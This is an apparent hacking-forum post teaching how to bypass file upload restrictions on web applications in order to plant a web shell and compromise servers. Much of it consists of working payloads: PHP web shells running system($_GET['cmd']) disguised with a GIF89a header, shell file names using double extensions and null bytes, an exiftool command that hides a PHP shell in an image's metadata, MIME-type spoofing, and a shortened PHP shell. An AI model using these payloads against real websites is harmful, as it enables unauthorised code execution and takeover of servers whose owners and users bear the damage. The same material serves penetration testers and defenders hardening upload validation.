x32x01
  • by x32x01 ||
Some dynamic websites allow it’s users to upload files, images, songs, movies, or anything specific. Such as Facebook and Linkedin allow their users to upload profile pictures and resume. File uploading is crucial for many web applications and at the same time, its a big risk if proper security controls are not implemented on file uploads.
Bypass File Upload Restrictions on Web Apps to Pop a Shell
Because there are various techniques for hackers to bypass and beat file upload restrictions to pop a shell.

Introduction
Today, we’ll discuss how a hacker can make use of unrestricted file upload vulnerability to compromise websites and servers.

Before getting started! It is important to know the basic details about web shells and file upload vulnerabilities. Attackers use web shells for various operations such as executing shell commands, deleting files, creating files, downloading files, etc.

Often times it is possible just to upload a reverse shell without bypassing filters and restrictions.

Bypassing Blacklists
In blacklisting certain types of extensions are explicitly prohibited from being uploaded to the server. This might seems like an optimal solution to protect your server from getting infected, but it is possible to bypass certain conditions.

File Extensions
Developers my blacklist certain file extensions and prevent users from uploading those files that are considered dangerous for the server. But this can be bypass by changing some strings in extensions to upload and execute payload or web shell.
TypeExtensions
PHP.pht, phtml, .php, .php3, .php4, .php5, .php6, .inc
JSP.jsp, .jspx, .jsw, .jsv, and .jspf
Perl.pl, .pm, .cgi, .lib
Aspasp, .aspx
Coldfusion.cfm, cfml, .cfc, .dbm

In some cases changing extensions might not do the trick instead you have to do like,
Code:
.pHp, .Php, .phP

Bypassing Whitelists
In whitelisting, where the server only accepts only specific extensions. For example, a website where you have to upload a profile picture that might take JPG, JPEG, or PNG files.

Apache allows files to be uploaded with double extensions. That means we can trick the server into accepting a shell that also has a PNG extension in the end.
Code:
shell.php.png
shell.php%00.png
shell.php\x00.jpg

Another way to bypass whitelisting is to manipulating file type headers.

If a certain website accepts images that will also accept GIF images. We can add GIF89a to trick the server into uploading shell.
Code:
GIF89a; <?php system($_GET['cmd']); ?>

Code:
GIF89a;
<?
system($_GET['cmd']); # shellcode goes here
?>

EXIF Data
This method allows us to bypass file upload restrictions by utilizing EXIF data in an image. Inserting a comment that contains PHP code will be executed by the server when an image is processed.

You can do this with gimp or ExifTool
Code:
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' file.png
mv image.jpg image.php.png

MIME-type
Blacklisting MIME types is also a method of file upload validation. It may be bypassed by intercepting the POST request on the way to the server and modifying the MIME type.

Normal PHP MIME type:
Code:
Content-type: application/x-php
Replace with
Code:
Content-type: image/jpeg

Other Bypassing Methods
In some situations, the length of content can also cause trouble to validate uploaded files. For that, PHP shell command can be shortened like this,
Code:
<?='$_GET[x]'?>
 

Similar Threads

x32x01
Replies
0
Views
92
x32x01
x32x01
x32x01
Replies
0
Views
80
x32x01
x32x01
x32x01
Replies
0
Views
123
x32x01
x32x01
x32x01
Replies
0
Views
170
x32x01
x32x01
x32x01
Replies
0
Views
594
x32x01
x32x01
TAGs: Tags
bypass file upload

Register & Login Faster

Forgot your password?

Latest Resources

Forum Statistics

Threads
517
Messages
518
Members
45
Latest Member
Tacola
Back
Top